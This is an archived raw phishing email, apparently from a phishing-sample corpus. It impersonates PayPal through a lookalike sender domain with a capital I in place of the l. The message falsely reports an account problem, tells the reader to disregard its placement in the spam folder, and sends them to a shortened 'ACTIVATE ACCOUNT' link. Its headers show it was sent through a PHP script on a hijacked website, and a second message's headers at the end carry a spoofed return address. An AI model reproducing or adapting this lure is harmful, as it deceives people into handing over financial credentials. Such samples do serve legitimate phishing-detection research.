From: PayPal.security <paypaI@e.paypaI.co.uk>
MIME-Version: 1.0
Content-Type: text/html
Message-Id: <E1aTe1i-000Eqm-FB@guiavegano.estadovirtual.net>
Date: Wed, 10 Feb 2016 21:18:26 -0200
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - guiavegano.estadovirtual.net
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [502 498] / [47 12]
X-AntiAbuse: Sender Address Domain - guiavegano.estadovirtual.net
X-Get-Message-Sender-Via: guiavegano.estadovirtual.net: authenticated_id: vegan/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: guiavegano.estadovirtual.net: vegan
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/vegan/public_html/vegan/components/meler.php 
X-Source-Dir: guiavegano.com.br:/public_html/vegan/components
Status: O
X-Status: 
X-Keywords:                  
X-UID: 64

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <meta http-equiv="Content-Type"
 content="text/html; charset=windows-1252">
  <style>

a{
    -webkit-transition:all .8s;
    -moz-transition:all .8s;
    -ms-transition:all .8s;
    padding:10px;
    border:2px solid #51B5FF;
    border-radius:2px;
    text-decoration:none;
    color:#51B5FF;
}
a:hover{
    background:#51B5FF;
    color:white;
}
  </style>
</head>
<body>
<div
 style="font-size: 10px; font-family: Arial black; color: rgb(145, 145, 145);">
<p style="font-size: 22px;"><strong><em><font
 color="#253b80">&nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
&nbsp;&nbsp; &nbsp; &nbsp;&nbsp;<big><big>
Pay</big></big></font><big><big><font
 color="#179bd7">Pal</font></big></big></em></strong><big><font
 size="1"><big><sub><big> Secure</big>
</sub></big></font></big></p>
</div>
<table id="emailWrapperTable"
 style="border: 2px solid rgb(81, 181, 255); font-family: Verdana,Arial,Helvetica,sans-serif; font-style: normal; font-variant: normal; font-weight: normal; font-size: 11px; line-height: normal; font-size-adjust: none; font-stretch: normal; color: rgb(51, 51, 51);"
 border="0" cellpadding="0" cellspacing="0"
 width="580">
  <tbody>
    <tr>
      <td colspan="3"></td>
    </tr>
    <tr>
      <td class="contentArea"
 style="margin: 0pt; padding: 12px; width: 530px;" width="530"><span
 style="color: rgb(0, 156, 222); font-size: 25px; font-family: HelveticaNeueLight,Helvetica Neue Light,Helvetica,Arial,sans-serif;">Notice
of changes to the <i><b><font
 style="color: rgb(2, 77, 152);">Pay</font>Pal</b></i>
user agreement.</span>
      <table style="" width="100%">
      </table>
      <p>Dear Customer,</p>
      <p>Log in to your <i><b><font
 style="color: rgb(2, 77, 152);">Pay</font>Pal</b></i>l
account as soon as possible</p>
      <ul>
        <strong><li>We have recently encountered a problem
in your account.</li>
        <li>when you created your <i><b><font
 style="color: rgb(2, 77, 152);">Pay</font>Pal</b></i>
account to make sure you're the account holder</li>
        <li>Click the Activation link and Follow the
instructions. !</li>
        </strong>
      </ul>
      <p align="center"> <b style="color: red;">[Notice]</b>
: If this email was sent to you in Junk or Spam folder <br>
Don't consider it as spam, This folder was mistakenly marked as spam by
      <br>
our new security update. <br>
      </p>
      <p style="width: 513px;" align="center"><big>&nbsp;
&nbsp;<big>Thanks</big>.</big> <br>
&nbsp;<br>
      </p>
      <p style="margin-left: 44px; width: 508px;"
 align="center"><big><big><a
 href="http://cutt.us/PvRD">ACTIVATE ACCOUNT</a></big></big>
      <table
 style="width: 182px; font-family: Arial,sans-serif; letter-spacing: normal; height: 36px;"
 border="0" cellpadding="10" cellspacing="0"
 width="182">
      </table>
      </p>
      <br>
      <p><strong><strong>Get more out of your account</strong></strong></p>
      <p><strong>Now is the time to make your <i><b><font
 style="color: rgb(2, 77, 152);">Pay</font>Pal</b></i>
account even more useful:</strong></p>
      <p><strong>Account Overview</strong></p>
      <ul>
        <li><strong>Get up-to-date information about your
payments.</strong></li>
        <li><strong>Add or withdraw money from your <i><b><font
 style="color: rgb(2, 77, 152);">Pay</font>Pal</b></i>
account.</strong></li>
        <li><strong>See a detailed transaction history.</strong></li>
      </ul>
      <p><strong>Yours sincerely,<br>
      <i><b><font style="color: rgb(2, 77, 152);">Pay</font>Pal</b>
      </i></strong></p>
      </td>
    </tr>
    <tr>
      <td colspan="3"></td>
    </tr>
  </tbody>
</table>
<table id="emailFooter"
 style="padding-top: 20px; font-family: Verdana,Arial,Helvetica,sans-serif; font-style: normal; font-variant: normal; font-weight: normal; font-size: 10px; line-height: normal; font-size-adjust: none; font-stretch: normal; color: rgb(51, 51, 51);"
 border="0" cellpadding="0" cellspacing="0"
 width="580">
  <tbody>
    <tr>
    </tr>
  </tbody>
</table>
</body>
</html>


From jose@monkey.org Thu Feb 11 17:45:03 2016 +0000
Return-Path: credential-updusaa@mail.mil
Delivered-To: jose@monkey.org
X-FDA: 71176895286.01.alarm74_6631980324f29
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 30,2,0,d41d8cd98f00b204,d41d8cd98f00b204,credential-updusaa@mail.mil,:credential-updusaa@mail.mil,RULES_HIT:41:327:355:379:871:988:989:1260:1313:1314:1345:1381:1516:1518:1522:1536:1575:1594:1692:1711:1730:1747:1764:1777:1792:2392:2393:2559:2562:3138:3139:3140:3141:3142:3876:3877:5007:6114:6261:6264:6618:6642:6687:6748:7281:7398:10004:10400:11604:11658:11914:12166:12340:12561:13110:14687:21080:30026:30054:30055:30056:30064,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:22,LUA_SUMMARY:none
X-HE-Tag: alarm74_6631980324f29
X-Filterd-Recvd-Size: 36355
Received: from smtp.wiband.com (unknown [64.56.129.253])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 11 Feb 2016 17:45:02 +0000 (UTC)
X-ASG-Debug-ID: 1455212699-0a6abf106f12760e0001-6JlXpt
Received: from smtp2.wiband.com (smtp2.wiband.com [64.56.129.17]) by smtp.wiband.com with ESMTP id 9H2kOHfdBvsjHH6Q; Thu, 11 Feb 2016 11:44:59 -0600 (CST)
